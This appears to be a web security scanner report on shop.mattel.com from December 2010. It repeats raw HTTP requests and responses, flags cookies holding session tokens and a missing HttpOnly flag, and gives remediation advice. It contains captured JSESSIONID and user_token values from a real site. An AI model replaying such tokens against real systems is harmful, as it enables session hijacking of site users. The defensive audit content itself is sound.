GET /affiliate/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /brand/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cart/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/cart/index. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Moved Temporarily Date: Thu, 23 Dec 2010 00:11:07 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache Location: https://shop.mattel.com/checkout/index.jsp?process=myaccount P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; expires=Sunday, 20-Dec-2020 00:11:07 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 315
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://shop.mattel.com/checkout/i ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /coreg/index.jsp?step=logout HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 23 Dec 2010 00:15:36 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache Location: https://shop.mattel.com/checkout/index.jsp?process=home P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=6TpLNSJL0sSbVTJGNGF9tvc8WHGvvD4HfTGyLfTM2DLYnwBrX1SZ!-1434729825; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 305
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://shop.mattel.com/checkout/i ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /emailSignup/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:16:04 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=z2JTNSJGhpmmnjKYH7vGhX4Xk9ZThL4KvvQmnmT1QN5WhZmWlN5h!-1434729825; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 51584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /giftCertificates/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /product/wishlist/wishlist.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://shop.mattel.com/coreg/inde ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/controller.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 23 Dec 2010 00:16:17 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache Location: http://shop.mattel.com/home/index.jsp?sr=1 P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=nNbLNSJRqVrxQdwRHw36YXlWtdsyz19pHJvCJ9Nvs8BXjClZGT1Q!-1434729825; path=/ Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:30:24 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 279
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/home/index. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/shop/index. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /storeLocator/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /product/index.jsp?productId=4199678 HTTP/1.1 Host: shop.mattel.com Proxy-Connection: keep-alive Referer: http://www.barbie.com/videogirl/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:09:12 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; path=/ Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/ Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/ Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/ Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:23:19 GMT; path=/ Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/ Set-Cookie: browser_id=118201181974; expires=Sunday, 20-Dec-2020 00:09:12 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 54256
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /affiliate/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /brand/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cart/index.jsp HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://shop.mattel.com/cart/index. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Moved Temporarily Date: Thu, 23 Dec 2010 00:11:07 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" Pragma: no-cache Location: https://shop.mattel.com/checkout/index.jsp?process=myaccount P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; expires=Sunday, 20-Dec-2020 00:11:07 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 315
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://shop.mattel.com/checkout/i ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
